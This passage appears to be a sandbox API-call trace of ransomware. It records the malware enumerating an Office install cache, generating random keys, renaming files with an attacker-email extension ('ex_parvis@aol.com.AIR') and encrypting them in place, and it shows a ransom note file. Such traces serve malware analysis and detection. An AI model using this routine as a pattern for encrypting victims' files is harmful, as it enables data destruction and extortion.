ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.719] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.719] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.719] GetLastError () returned 0x0 [0144.720] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.720] GetLastError () returned 0x0 [0144.720] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.720] GetLastError () returned 0x0 [0144.720] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.720] GetLastError () returned 0x0 [0144.720] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.720] GetLastError () returned 0x0 [0144.720] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.720] GetLastError () returned 0x0 [0144.720] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0144.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.720] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.721] GetLastError () returned 0x0 [0144.721] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.721] GetLastError () returned 0x0 [0144.721] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.721] GetLastError () returned 0x0 [0144.721] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.721] GetLastError () returned 0x0 [0144.721] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.721] GetLastError () returned 0x0 [0144.721] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97242fd0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3291b0 [0144.721] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.721] GetLastError () returned 0x0 [0144.721] FindNextFileW (in: hFindFile=0x35e198, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97242fd0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0144.722] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385c08 [0144.722] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0144.722] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0144.722] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.722] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.722] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0144.723] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0144.723] GetProcessHeap () returned 0x2e0000 [0144.723] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x30d0110 [0144.723] lstrcpyW (in: lpString1=0x30d0110, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" [0144.723] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0144.723] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.726] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0144.726] GetProcessHeap () returned 0x2e0000 [0144.726] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0110 | out: hHeap=0x2e0000) returned 1 [0144.726] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=31094) returned 1 [0144.726] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7976 [0144.726] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.726] GetProcessHeap () returned 0x2e0000 [0144.726] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.726] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.727] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.728] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.728] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7976) returned 0x3a7410 [0144.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7976) returned 0x3aed90 [0144.728] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.728] ReadFile (in: hFile=0x4a4, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x7976, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x7976, lpOverlapped=0x0) returned 1 [0144.729] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-31094, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.729] WriteFile (in: hFile=0x4a4, lpBuffer=0x3aed90*, nNumberOfBytesToWrite=0x7976, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aed90*, lpNumberOfBytesWritten=0x2acf9c8*=0x7976, lpOverlapped=0x0) returned 1 [0144.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0144.730] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aed90 | out: hHeap=0x2e0000) returned 1 [0144.731] CloseHandle (hObject=0x4a4) returned 1 [0144.732] GetProcessHeap () returned 0x2e0000 [0144.732] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.732] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0144.732] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0144.732] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385c08 | out: hHeap=0x2e0000) returned 1 [0144.732] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385b60 | out: hHeap=0x2e0000) returned 1 [0144.732] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385b60 [0144.732] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0144.732] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0144.732] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.732] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.732] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1 [0144.733] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73 [0144.733] GetProcessHeap () returned 0x2e0000 [0144.733] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x30d0110 [0144.733] lstrcpyW (in: lpString1=0x30d0110, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" [0144.733] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0144.733] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.736] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0144.736] GetProcessHeap () returned 0x2e0000 [0144.736] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0110 | out: hHeap=0x2e0000) returned 1 [0144.736] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1377656) returned 1 [0144.736] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x150578 [0144.736] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.736] GetProcessHeap () returned 0x2e0000 [0144.736] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.736] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.736] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.738] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.738] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.738] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x150578) returned 0x33d0020 [0144.738] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x150578) returned 0x3530020 [0144.738] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.739] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x150578, lpOverlapped=0x0) returned 1 [0144.797] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.797] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.797] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", dwFileAttributes=0x80) returned 1 [0144.798] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 76 [0144.798] GetProcessHeap () returned 0x2e0000 [0144.798] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0144.798] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" [0144.798] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0144.798] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All 